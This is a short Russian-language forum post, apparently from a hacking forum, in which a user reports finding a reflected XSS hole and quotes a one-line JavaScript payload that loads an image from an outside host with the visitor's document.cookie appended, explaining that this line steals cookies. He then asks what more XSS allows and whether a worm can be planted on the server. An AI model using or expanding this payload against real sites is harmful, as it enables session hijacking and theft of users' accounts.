Показать сообщение отдельно

  #1  
Старый 01.10.2013, 01:00
panfilov91
Познающий
Регистрация: 18.01.2013
Сообщений: 68
С нами: 7008086

Репутация: 0
По умолчанию

Есть пассивная XSS, работает только с этим кодом:

code:


img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;

За кражу cookie отвечает +document.cookie;

А что можно еще сделать с XSS?
Можно ли загнать на сервер какого нибудь червя?
 
Ответить с цитированием